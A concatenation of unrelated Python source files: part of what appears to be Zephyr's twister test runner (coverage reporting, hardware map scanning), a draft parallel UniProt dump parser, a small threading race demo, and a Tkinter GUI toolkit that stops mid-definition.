handler_time = instance.metrics.get('handler_time', 0)
ram_size = instance.metrics.get ("ram_size", 0)
rom_size = instance.metrics.get("rom_size",0)
for k in instance.results.keys():
testcases = list(filter(lambda d: not (d.get('testcase') == k and d.get('platform') == p), testcases ))
testcase = {"testcase": k,
"arch": instance.platform.arch,
"platform": p,
}
if ram_size:
testcase["ram_size"] = ram_size
if rom_size:
testcase["rom_size"] = rom_size
if instance.results[k] in ["SKIP"] or instance.status == 'skipped':
testcase["status"] = "skipped"
testcase["reason"] = instance.reason
elif instance.results[k] in ["PASS"] or instance.status == 'passed':
testcase["status"] = "passed"
if instance.handler:
testcase["execution_time"] = handler_time
elif instance.results[k] in ['FAIL', 'BLOCK'] or instance.status in ["error", "failed", "timeout", "flash_error"]:
testcase["status"] = "failed"
testcase["reason"] = instance.reason
testcase["execution_time"] = handler_time
if os.path.exists(handler_log):
testcase["test_output"] = self.process_log(handler_log)
elif os.path.exists(device_log):
testcase["device_log"] = self.process_log(device_log)
else:
testcase["build_log"] = self.process_log(build_log)
testcases.append(testcase)
suites = [ {"testcases": testcases} ]
report["testsuites"] = suites
with open(filename, "wt") as json_file:
json.dump(report, json_file, indent=4, separators=(',',':'))
def get_testcase(self, identifier):
results = []
for _, tc in self.testcases.items():
for case in tc.cases:
if case == identifier:
results.append(tc)
return results
def verify_platforms_existence(self, platform_names_to_verify, log_info=""):
"""
Verify if platform name (passed by --platform option, or in yaml file
as platform_allow or integration_platforms options) is correct. If not -
log and raise error.
"""
for platform in platform_names_to_verify:
if platform in self.platform_names:
break
else:
logger.error(f"{log_info} - unrecognized platform - {platform}")
sys.exit(2)
def create_build_dir_links(self):
"""
Iterate through all no-skipped instances in suite and create links
for each one build directories. Those links will be passed in the next
steps to the CMake command.
"""
links_dir_name = "twister_links" # folder for all links
links_dir_path = os.path.join(self.outdir, links_dir_name)
if not os.path.exists(links_dir_path):
os.mkdir(links_dir_path)
for instance in self.instances.values():
if instance.status != "skipped":
self._create_build_dir_link(links_dir_path, instance)
def _create_build_dir_link(self, links_dir_path, instance):
"""
Create build directory with original "long" path. Next take shorter
path and link them with original path - create link. At the end
replace build_dir to created link. This link will be passed to CMake
command. This action helps to limit path length which can be
significant during building by CMake on Windows OS.
"""
os.makedirs(instance.build_dir, exist_ok=True)
link_name = f"test_{self.link_dir_counter}"
link_path = os.path.join(links_dir_path, link_name)
if os.name == "nt": # if OS is Windows
command = ["mklink", "/J", f"{link_path}", f"{instance.build_dir}"]
subprocess.call(command, shell=True)
else: # for Linux and MAC OS
os.symlink(instance.build_dir, link_path)
# Here original build directory is replaced with symbolic link. It will
# be passed to CMake command
instance.build_dir = link_path
self.link_dir_counter += 1
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Gcovr()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
logger.debug(f"Select {tool} as the coverage tool...")
return t
@staticmethod
def retrieve_gcov_data(input_file):
logger.debug("Working on %s" % input_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
with open(input_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
# if kobject_hash is given for coverage gcovr fails
# hence skipping it problem only in gcovr v4.1
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append('*/' + pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
cmd = ["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(".*/" + pattern + '/.*')
@staticmethod
def _interleave_list(prefix, list):
tuple_list = [(prefix, item) for item in list]
return [item for sublist in tuple_list for item in sublist]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
cmd = ["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes + ["--json", "-o",
coveragefile, outdir]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class DUT(object):
def __init__(self,
id=None,
serial=None,
serial_baud=None,
platform=None,
product=None,
serial_pty=None,
connected=False,
pre_script=None,
post_script=None,
post_flash_script=None,
runner=None):
self.serial = serial
self.baud = serial_baud or 115200
self.platform = platform
self.serial_pty = serial_pty
self._counter = Value("i", 0)
self._available = Value("i", 1)
self.connected = connected
self.pre_script = pre_script
self.id = id
self.product = product
self.runner = runner
self.fixtures = []
self.post_flash_script = post_flash_script
self.post_script = post_script
self.pre_script = pre_script
self.probe_id = None
self.notes = None
self.lock = Lock()
self.match = False
@property
def available(self):
with self._available.get_lock():
return self._available.value
@available.setter
def available(self, value):
with self._available.get_lock():
self._available.value = value
@property
def counter(self):
with self._counter.get_lock():
return self._counter.value
@counter.setter
def counter(self, value):
with self._counter.get_lock():
self._counter.value = value
def to_dict(self):
d = {}
exclude = ['_available', '_counter', 'match']
v = vars(self)
for k in v.keys():
if k not in exclude and v[k]:
d[k] = v[k]
return d
def __repr__(self):
return f"<{self.platform} ({self.product}) on {self.serial}>"
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "schemas", "twister", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*', 'STLINK-V3'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.duts = []
def add_device(self, serial, platform, pre_script, is_pty, baud=None):
device = DUT(platform=platform, connected=True, pre_script=pre_script, serial_baud=baud)
if is_pty:
device.serial_pty = serial
else:
device.serial = serial
self.duts.append(device)
def load(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
duts = scl.yaml_load_verify(map_file, hwm_schema)
for dut in duts:
pre_script = dut.get('pre_script')
post_script = dut.get('post_script')
post_flash_script = dut.get('post_flash_script')
platform = dut.get('platform')
id = dut.get('id')
runner = dut.get('runner')
serial = dut.get('serial')
baud = dut.get('baud', None)
product = dut.get('product')
fixtures = dut.get('fixtures', [])
new_dut = DUT(platform=platform,
product=product,
runner=runner,
id=id,
serial=serial,
serial_baud=baud,
connected=serial is not None,
pre_script=pre_script,
post_script=post_script,
post_flash_script=post_flash_script)
new_dut.fixtures = fixtures
new_dut.counter = 0
self.duts.append(new_dut)
def scan(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = DUT(platform="unknown",
id=d.serial_number,
serial=persistent_map.get(d.device, d.device),
product=d.product,
runner='unknown',
connected=True)
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev.runner = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev.runner = runner
s_dev.connected = True
s_dev.lock = None
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def save(self, hwm_file):
# use existing map
self.detected.sort(key=lambda x: x.serial or '')
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=SafeLoader)
if hwm:
hwm.sort(key=lambda x: x['serial'] or '')
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
for _detected in self.detected:
for h in hwm:
if _detected.id == h['id'] and _detected.product == h['product'] and not _detected.match:
h['connected'] = True
h['serial'] = _detected.serial
_detected.match = True
new_duts = list(filter(lambda d: not d.match, self.detected))
new = []
for d in new_duts:
new.append(d.to_dict())
if hwm:
hwm = hwm + new
else:
hwm = new
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, Dumper=Dumper, default_flow_style=False)
self.load(hwm_file)
logger.info("Registered devices:")
self.dump()
else:
# create new file
dl = []
for _connected in self.detected:
platform = _connected.platform
id = _connected.id
runner = _connected.runner
serial = _connected.serial
product = _connected.product
d = {
'platform': platform,
'id': id,
'runner': runner,
'serial': serial,
'product': product,
'connected': _connected.connected
}
dl.append(d)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(dl, yaml_file, Dumper=Dumper, default_flow_style=False)
logger.info("Detected devices:")
self.dump(detected=True)
def dump(self, filtered=[], header=[], connected_only=False, detected=False):
print("")
table = []
if detected:
to_show = self.detected
else:
to_show = self.duts
if not header:
header = ["Platform", "ID", "Serial device"]
for p in to_show:
platform = p.platform
connected = p.connected
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.id, p.serial])
print(tabulate(table, headers=header, tablefmt="github"))
|
parallel_parse_UniProt_dump_v2.py
|
# from collections import defaultdict
import os, fileinput, subprocess, sys
import zlib, gzip
import tools, variables
import create_SQL_tables_snakemake as cst
import obo_parser
import random, multiprocessing
from collections import deque
PLATFORM = sys.platform
# def unzip_file(fn_in, fn_out, number_of_processes=4):
# if PLATFORM == "linux": # Debian: "Linux"
# fn_bash_script = "bash_script_pigz.sh"
# with open(fn_bash_script, "w") as fh:
# fh.write("#!/usr/bin/env bash\n")
# shellcmd_1 = "pigz -c -d -p {} {} > {}".format(number_of_processes, fn_in, fn_out)
# fh.write(shellcmd_1 + "\n")
# subprocess.call("chmod 744 ./{}".format(fn_bash_script), shell=True)
# subprocess.call("./{}".format(fn_bash_script), shell=True)
# os.remove(fn_bash_script)
# else:
# tools.gunzip_file(fn_in, fn_out=fn_out)
#
# def split_file_into_chunks_using_delimiter(fn_in, dir_out, num_chunks, recstart, recend):
# if not os.path.exists(dir_out):
# os.makedirs(dir_out)
# size = os.path.getsize(fn_in)
# positions = sorted([random.randint(0, size) for _ in range(num_chunks)])
# # for
from multiprocessing import JoinableQueue
from multiprocessing.context import Process
class Renderer:
queue = None
def __init__(self, nb_workers=2):
self.queue = JoinableQueue()
self.processes = [Process(target=self.upload) for i in range(nb_workers)]
for p in self.processes:
p.start()
def render(self, item):
self.queue.put(item)
def upload(self):
while True:
item = self.queue.get()
if item is None:
break
# process your item here
self.queue.task_done()
def terminate(self):
""" wait until queue is empty and terminate processes """
self.queue.join()
for p in self.processes:
p.terminate()
# r = Renderer()
# r.render(item1)
# r.render(item2)
# r.terminate()
def Protein_2_Function_table_UniProtDump_UPS(fn_in_Functions_table_UPK, fn_in_obo_GO, fn_in_obo_UPK, fn_in_list_uniprot_dumps, fn_in_interpro_parent_2_child_tree, fn_in_hierarchy_reactome, fn_out_Protein_2_Function_table_UniProt_dump, fn_out_UniProtID_2_ENSPs_2_KEGGs_mapping, fn_out_UniProt_AC_2_ID_2_Taxid, verbose=True):
# fn_in_list_uniprot_dumps_temp = []
# for fn_in in fn_in_list_uniprot_dumps:
# fn_out = fn_in.replace("gz", "") + ".temp"
# fn_in_list_uniprot_dumps_temp.append(fn_out)
# unzip_file(fn_in, fn_out, number_of_processes=4)
fn_in_Functions_table_UPK = os.path.join(variables.TABLES_DIR, "Functions_table_UPK.txt")
fn_in_obo_GO = os.path.join(variables.DOWNLOADS_DIR, "go-basic.obo")
fn_in_obo_UPK = os.path.join(variables.DOWNLOADS_DIR, "keywords-all.obo")
fn_in_interpro_parent_2_child_tree = os.path.join(variables.DOWNLOADS_DIR, "interpro_parent_2_child_tree.txt")
fn_in_hierarchy_reactome = os.path.join(variables.DOWNLOADS_DIR, "RCTM_hierarchy.tsv")
etype_UniProtKeywords = variables.id_2_entityTypeNumber_dict["UniProtKeywords"]
etype_GOMF = variables.id_2_entityTypeNumber_dict['GO:0003674']
etype_GOCC = variables.id_2_entityTypeNumber_dict['GO:0005575']
etype_GOBP = variables.id_2_entityTypeNumber_dict['GO:0008150']
etype_interpro = variables.id_2_entityTypeNumber_dict['INTERPRO']
etype_pfam = variables.id_2_entityTypeNumber_dict['PFAM']
etype_reactome = variables.id_2_entityTypeNumber_dict['Reactome']
GO_dag = obo_parser.GODag(obo_file=fn_in_obo_GO, upk=False)
UPK_dag = obo_parser.GODag(obo_file=fn_in_obo_UPK, upk=True)
UPK_Name_2_AN_dict = cst.get_keyword_2_upkan_dict(fn_in_Functions_table_UPK)
# UPKs_not_in_obo_list, GOterms_not_in_obo_temp = [], []
child_2_parent_dict_interpro, _ = cst.get_child_2_direct_parents_and_term_2_level_dict_interpro(fn_in_interpro_parent_2_child_tree)
lineage_dict_interpro = cst.get_lineage_from_child_2_direct_parent_dict(child_2_parent_dict_interpro)
child_2_parent_dict_reactome = cst.get_child_2_direct_parent_dict_RCTM(fn_in_hierarchy_reactome)
counter = 0
num_entries = 1000
num_workers = 10
# pool = multiprocessing.Pool(num_workers)
queue = JoinableQueue()
entries_2_work = deque()
# entries_2_work.append()
for uniprot_dump in fn_in_list_uniprot_dumps:
for entries in yield_entry_UniProt_dat_dump_parallel(uniprot_dump, num_entries):
entries_2_work.append(entries)
stuff = entries, UPK_Name_2_AN_dict, UPK_dag, lineage_dict_interpro, child_2_parent_dict_reactome, GO_dag, etype_UniProtKeywords, etype_GOMF, etype_GOCC, etype_GOBP, etype_interpro, etype_pfam, etype_reactome
# pool.map(bubu, stuff)
queue.join(bubu, stuff)
def yield_entry_UniProt_dat_dump_parallel(fn_in, num_entries=100):
entries = []
counter = 0
for entry in cst.yield_entry_UniProt_dat_dump(fn_in):
entries.append(entry)
counter += 1
if counter % num_entries == 0:
yield entries
entries = []
yield entries
def bubu(entries, UPK_Name_2_AN_dict, UPK_dag, lineage_dict_interpro, child_2_parent_dict_reactome, GO_dag, etype_UniProtKeywords, etype_GOMF, etype_GOCC, etype_GOBP, etype_interpro, etype_pfam, etype_reactome):
for UniProtID, UniProtAC_list, NCBI_Taxid, functions_2_return in parse_uniprot_dat_dump_yield_entry_v2_parallel(entries):
Keywords_list, GOterm_list, InterPro, Pfam, KEGG, Reactome, STRING, *Proteomes = functions_2_return
# ['Complete proteome', 'Reference proteome', 'Transcription', 'Activator', 'Transcription regulation', ['GO:0046782'], ['IPR007031'], ['PF04947'], ['vg:2947773'], [], [], ['UP000008770']]
# for UniProtAN in UniProtAC_and_ID_list:
if len(Keywords_list) > 0:
UPK_ANs, UPKs_not_in_obo_temp = cst.map_keyword_name_2_AN(UPK_Name_2_AN_dict, Keywords_list)
# UPKs_not_in_obo_list += UPKs_not_in_obo_temp
UPK_ANs, UPKs_not_in_obo_temp = cst.get_all_parent_terms(UPK_ANs, UPK_dag)
# UPKs_not_in_obo_list += UPKs_not_in_obo_temp
if len(UPK_ANs) > 0:
# fh_out.write(UniProtID + "\t" + cst.format_list_of_string_2_postgres_array(sorted(UPK_ANs)) + "\t" + etype_UniProtKeywords + "\t" + NCBI_Taxid + "\n")
print(UniProtID + "\t" + cst.format_list_of_string_2_postgres_array(sorted(UPK_ANs)) + "\t" + etype_UniProtKeywords + "\t" + NCBI_Taxid + "\n")
if len(GOterm_list) > 0: # do backtracking, split GO into 3 categories and add etype
GOterm_list, not_in_obo_GO = cst.get_all_parent_terms(GOterm_list, GO_dag)
# GOterms_not_in_obo_temp += not_in_obo_GO
MFs, CPs, BPs, not_in_obo_GO = cst.divide_into_categories(GOterm_list, GO_dag, [], [], [], [])
# GOterms_not_in_obo_temp += not_in_obo_GO
if MFs:
# fh_out.write(UniProtID + "\t" + cst.format_list_of_string_2_postgres_array(sorted(MFs)) + "\t" + etype_GOMF + "\t" + NCBI_Taxid + "\n") # 'Molecular Function', -23
print(UniProtID + "\t" + cst.format_list_of_string_2_postgres_array(sorted(MFs)) + "\t" + etype_GOMF + "\t" + NCBI_Taxid + "\n") # 'Molecular Function', -23
if CPs:
# fh_out.write(UniProtID + "\t" + cst.format_list_of_string_2_postgres_array(sorted(CPs)) + "\t" + etype_GOCC + "\t" + NCBI_Taxid + "\n") # 'Cellular Component', -22
print(UniProtID + "\t" + cst.format_list_of_string_2_postgres_array(sorted(CPs)) + "\t" + etype_GOCC + "\t" + NCBI_Taxid + "\n") # 'Cellular Component', -22
if BPs:
# fh_out.write(UniProtID + "\t" + cst.format_list_of_string_2_postgres_array(sorted(BPs)) + "\t" + etype_GOBP + "\t" + NCBI_Taxid + "\n") # 'Biological Process', -21
print(UniProtID + "\t" + cst.format_list_of_string_2_postgres_array(sorted(BPs)) + "\t" + etype_GOBP + "\t" + NCBI_Taxid + "\n") # 'Biological Process', -21
if len(InterPro) > 0:
InterPro_set = set(InterPro)
for id_ in InterPro:
InterPro_set.update(lineage_dict_interpro[id_])
# fh_out.write(UniProtID + "\t" + cst.format_list_of_string_2_postgres_array(sorted(InterPro_set)) + "\t" + etype_interpro + "\t" + NCBI_Taxid + "\n")
print(UniProtID + "\t" + cst.format_list_of_string_2_postgres_array(sorted(InterPro_set)) + "\t" + etype_interpro + "\t" + NCBI_Taxid + "\n")
if len(Pfam) > 0:
# fh_out.write(UniProtID + "\t" + cst.format_list_of_string_2_postgres_array(sorted(Pfam)) + "\t" + etype_pfam + "\t" + NCBI_Taxid + "\n")
print(UniProtID + "\t" + cst.format_list_of_string_2_postgres_array(sorted(Pfam)) + "\t" + etype_pfam + "\t" + NCBI_Taxid + "\n")
if len(Reactome) > 0:
reactome_list = Reactome.copy()
for term in reactome_list:
reactome_list += list(cst.get_parents_iterative(term, child_2_parent_dict_reactome))
# fh_out.write(UniProtID + "\t" + cst.format_list_of_string_2_postgres_array(sorted(set(reactome_list))) + "\t" + etype_reactome + "\t" + NCBI_Taxid + "\n")
print(UniProtID + "\t" + cst.format_list_of_string_2_postgres_array(sorted(set(reactome_list))) + "\t" + etype_reactome + "\t" + NCBI_Taxid + "\n")
# translation needed from KEGG identifier to pathway, ID vs AC can be easily distinguished via "_"
if len(KEGG) > 0:
# fh_out_UniProtID_2_ENSPs_2_KEGGs_mapping.write(UniProtID + "\t" + ";".join(STRING) + "\t" + ";".join(sorted(set(KEGG))) + "\t" + NCBI_Taxid + "\n")
print("222_UniProtID_2_ENSPs_2_KEGGs_2_Taxid " + UniProtID + "\t" + ";".join(STRING) + "\t" + ";".join(sorted(set(KEGG))) + "\t" + NCBI_Taxid + "\n")
for AC in UniProtAC_list:
# fh_out_UniProt_AC_2_ID_2_Taxid.write("{}\t{}\t{}\n".format(AC, UniProtID, NCBI_Taxid))
print("111_UniProt_AC_2_ID_2_Taxid {}\t{}\t{}\n".format(AC, UniProtID, NCBI_Taxid))
def parse_uniprot_dat_dump_yield_entry_v2_parallel(entries):
"""
UniProtKeywords
GO
InterPro
Pfam
KEGG
Reactome
@KEGG : I have a mapping from UniProt accession (e.g. "P31946") to KEGG entry (e.g. "hsa:7529")
what I'm missing is from KEGG entry to KEGG pathway (e.g.
hsa:7529 path:hsa04110
hsa:7529 path:hsa04114
hsa:7529 path:hsa04722)
"""
# for entry in yield_entry_UniProt_dat_dump(fn_in):
for entry in entries:
UniProtAC_list, Keywords_string, functions_2_return = [], "", []
Functions_other_list = []
UniProtID, NCBI_Taxid = "-1", "-1"
for line in entry:
try:
line_code, rest = line.split(maxsplit=1)
except ValueError:
continue
if line_code == "ID":
UniProtID = rest.split()[0]
elif line_code == "AC":
UniProtAC_list += [UniProtAN.strip() for UniProtAN in rest.split(";") if len(UniProtAN) > 0]
elif line_code == "KW":
Keywords_string += rest
elif line_code == "DR":
Functions_other_list.append(rest)
elif line_code == "OX":
# OX NCBI_TaxID=654924;
# OX NCBI_TaxID=418404 {ECO:0000313|EMBL:QAB05112.1};
if rest.startswith("NCBI_TaxID="):
NCBI_Taxid = rest.replace("NCBI_TaxID=", "").split(";")[0].split()[0]
# UniProtAC_list = sorted(set(UniProtAC_list))Taxid_2_funcEnum_2_scores_table_FIN
Keywords_list = [cst.cleanup_Keyword(keyword) for keyword in sorted(set(Keywords_string.split(";"))) if len(keyword) > 0] # remove empty strings from keywords_list
other_functions = cst.helper_parse_UniProt_dump_other_functions(Functions_other_list)
# GO, InterPro, Pfam, KEGG, Reactome, STRING, Proteomes
functions_2_return.append(Keywords_list)
functions_2_return += other_functions
# Keywords_list, GO, InterPro, Pfam, KEGG, Reactome, STRING, Proteomes
# GO, InterPro, Pfam, KEGG, Reactome, STRING, Proteomes
yield UniProtID, UniProtAC_list, NCBI_Taxid, functions_2_return
if __name__ == "__main__":
Protein_2_Function_table_UniProtDump_UPS()
|
thread_queue.py
|
from threading import Thread
aLi = [0]
def func1(aLi):
for i in range(100000):
aLi[0] += 1
def func2(aLi):
for i in range(100000):
aLi[0] -= 1
t1 = Thread(target=func1, args=(aLi, ))
t2 = Thread(target=func2, args=(aLi, ))
t1.start()
t2.start()
t1.join()
t2.join()
print(aLi)
|
tkit.py
|
# -*- coding: utf-8 -*-
"""tkit.py -- Tkinter Tool Kit
This module provides a light, object-oriented API for rapid GUI design with
Tkinter.
Author: Garin Wally; Feb 2015; Oct 2017
Specs:
all widgets should have a .name attribute
all widgets should have a .set_parent method
"""
# Imports
try:
import tkinter as tk
except ImportError:
import Tkinter as tk
import os
import re
import time
import ttk
import tkMessageBox
import tkFileDialog
import threading
import logging
from collections import OrderedDict
from time import sleep
from tkSimpleDialog import askinteger, askstring, askfloat
from types import MethodType
# Location of module
_DIR = os.path.dirname(__file__)
# Open folder icon
OPENFOLDER = os.path.join(_DIR, "icons/openfolder.gif").replace("\\", "/")
def NULL_ACTION(*args, **kwargs):
"""Function to replace calling None."""
pass
def _clean_name(name):
return re.sub("[\W]", "", name.lower().replace(" ", "_"))
# ==============================================================================
# THREADING
def build_gui(app):
root = tk.Tk()
app(root).pack(fill='both', expand='yes')
root.mainloop()
def threaded_gui(app): # TODO: not start immediately...
gui = ThreadedClient("GUI", lambda: build_gui(app))
gui.start()
gui.join()
def thread_tasks(tasks, target=None):
"""Starts all functions in a list as threads.
Args:
tasks (list): list of functions to start as threads
target: a progress widget
"""
def delay_end(target, threads):
if target is None:
return
while any([t.is_alive() for t in threads]):
time.sleep(.2)
target.stop()
return
for task in tasks:
threads = []
t = threading.Thread(target=task)
t.daemon = True
threads.append(t)
t.start()
end = threading.Thread(target=delay_end, args=(target, threads))
end.start()
if target:
target.run()
return
class ThreadedClient(threading.Thread):
def __init__(self, name, process):
"""Subclass of thread allows for easier thread creation."""
threading.Thread.__init__(self)
self.name = name
self.process = process
def run(self):
"""Runs at thread start."""
logging.debug("{0} thread started".format(self.name))
self.process()
logging.debug("{0} thread terminated".format(self.name))
# ==============================================================================
# APP WINDOWS
class BaseApp(tk.Tk):
"""Basic App object."""
def __init__(self, title="", width=400, height=200):
tk.Tk.__init__(self)
# Parent window properties
self.geometry("{width}x{height}".format(width=width, height=height))
self.title(title)
self._startup()
# All child widgets should have parent/root set to the app
# Widgets objects are referenced in the widgets dict by name
self.widgets = {}
self.input_values = {}
# Custom closing procedure
self.on_close = NULL_ACTION
def _startup(self):
"""Handle window startup procedures."""
# Force to top when opened
self.attributes("-topmost", True)
self.attributes("-topmost", False)
# Activate/focus on window
self.focus_force()
# Set window close (X) handler
self.protocol("WM_DELETE_WINDOW", self.close)
def add_widget(self, widget, name=""):
"""Add a widget object to the app."""
if not name:
name = widget.name
widget.set_parent(self)
self.widgets[_clean_name(name)] = widget
return
def close(self):
"""Handle the closing of the window."""
# Close the window
self.destroy()
# End the process
self.quit()
# Do anything else
self.on_close()
def set_topmost(self, on_top=True):
"""Lock window to top."""
self.attributes("-topmost", on_top)
return
class App(BaseApp):
"""App Window."""
def __init__(self, title="", width=400, height=200):
BaseApp.__init__(self, title, width, height)
self._startup()
def add_button(self, label, action, **kwargs):
"""Adds a button."""
button = ttk.Button(self, text=label, command=action)
button.pack(kwargs)
name = _clean_name(label)
self.widgets[name + "_button"] = button
return
def add_text_input(self, label, length=20):
"""Adds a text box and label."""
ttk.Label(text="{} ".format(label)).pack(padx=10, pady=0)
text_box = ttk.Entry(self, width=length)
text_box.pack(padx=10, pady=10)
name = _clean_name(label)
self.widgets[name + "_textbox"] = text_box
return
def cmd_collect_values(self):
"""Executes all widgets' .get() method to collect user input values."""
for name, widget in self.widgets.items():
try:
input_val = widget.get()
print(input_val)
self.input_values[name] = input_val
except (AttributeError, tk.TclError):
pass
def cmd_collect_quit(self):
"""Combines the collect values and close command."""
self.cmd_collect_values()
self.close()
return
def add_command(self, name, func):
"""Add a function as a window method; can be called by widgets."""
setattr(self, name, MethodType(func, self))
return
# TODO:
class ThreadedApp(threading.Thread, App):
"""Threaded App."""
def __init__(self, title="", width=400, height=200):
threading.Thread.__init__(self)
App.__init__(self, title, width, height)
# Parent window properties
#self.geometry("{width}x{height}".format(
# width=width, height=height))
self.title(title)
self.name = title
self._startup()
def close(self):
"""Handle the closing of the window."""
self.destroy()
self.quit()
#self.on_close()
try:
self.join()
logging.debug("{} thread terminated".format(self.name))
except RuntimeError:
pass
def run(self):
"""Threaded process called by .start() via mainloop()."""
self.protocol("WM_DELETE_WINDOW", self.close)
logging.debug("{} thread started".format(self.name))
self.main()
logging.debug("{} thread complete".format(self.name))
def mainloop_and_run(self):
